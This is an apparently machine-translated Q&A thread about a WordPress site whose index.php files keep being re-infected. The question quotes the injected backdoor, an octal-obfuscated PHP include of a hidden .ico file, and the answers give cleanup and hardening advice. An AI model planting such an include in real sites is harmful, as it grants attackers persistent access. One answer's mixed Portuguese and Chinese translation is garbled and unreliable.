不断用index.php文件注入的Wordpress网站

时间:2018-12-15 00:12:41

标签: wordpress code-injection

在过去6天里,我一直在Wordpress安装中找到带有以下代码行和类似代码的index.php文件。

/*371bd*/

@include "\057hom\145/tm\142m20\0616/p\165bli\143_ht\155l/V\151deo\163/ba\143kwp\165p-9\0622c4\070-te\155p/a\0622e4\143b96\1468d0\066a49\145521\143cfa\066881\146fe/\0568c7\1453c7\067.ic\157";

/*371bd*/

每天,我都会通过扫描完全删除所有index.php文件,并且我还使用Wordfence查找并删除了恶意代码。

一旦打扫干净,我第二天就回来,一切都回来了!我如何一劳永逸地停止这一步?

2 个答案:

答案 0 :(得分:1)

您的网站已遭到入侵-这是对功能较弱的Wordpress网站的典型攻击。

首要:

请勿使用从粗略网站下载的“免费”付费主题。您可以从Wordpress主题页面使用真正的免费主题,也可以从信誉良好的供应商那里购买真正的高级主题。

请勿使用从粗略网站下载的“免费”付费插件。可以使用合法的插件,也可以从信誉良好的供应商处购买高级插件。

如何一劳永逸地阻止它?

1)如果您使用某些狡猾网站上的“免费”(付费)主题,请不要使用。它们通常包含诸如此类的后门。

使用合法的免费主题或支付高级主题费用。

2)更改密码,从电子邮件更改为虚拟主机。如果使用的话,其中包括您的cPanel和FTP。

3)完全清除服务器/ public_html文件夹中的所有文件-重新开始。

4)删除所有MySQL数据库。

4)使用合法主题重新安装Wordpress,并确保您不使用“ admin”或“ administrator”作为用户名,将其设置为其他名称并设置强密码。

5)完全重新安装后,使用安全插件,例如WP Cerber(优秀插件),并将默认登录URL从/wp-login更改为自定义名称(WP Cerber具有此功能)

6)请勿使用您之前用于任何内容的相同用户名/密码。密码管理器可以在这里派上用场,例如LastPass,它将为您生成并记住非常强大的密码。

7)额外的步骤:如果您熟悉命令行,请使用WP Scan来测试您的网站是否存在漏洞。这是一种工具设计,目的是要确保您只在自己的网站上使用,尽管它本质上是在寻找“进入”并破坏该网站的方法,并且可能并非严格合法地针对他人进行合法操作网站。

答案 1 :(得分:0)

今天,我复活了两个已离线感染UBH(孟加拉国联合黑客恶意软件)的网站。 这不是一个非常简单的任务,需要命令行知识。

首先使用wp-cli工具检查核心Wordpress文件的一致性。

运行命令:

wp core verify-checksums --allow-root

The result

Success: WordPress installation verifies against checksums.

[PT-BR] Hoje eu ressucitei dois网站位于estavam脱机infectados com UBH。 Nãofoi uma tarefa bem simples e requer conhecimentos de linha de comando。

一个基本面,它的字面意思是Wordpress a ferramenta wp-cli foi o caminho。

Rode o comando:

wp core verify-checksums --allow-root

O resultado

Success: WordPress installation verifies against checksums.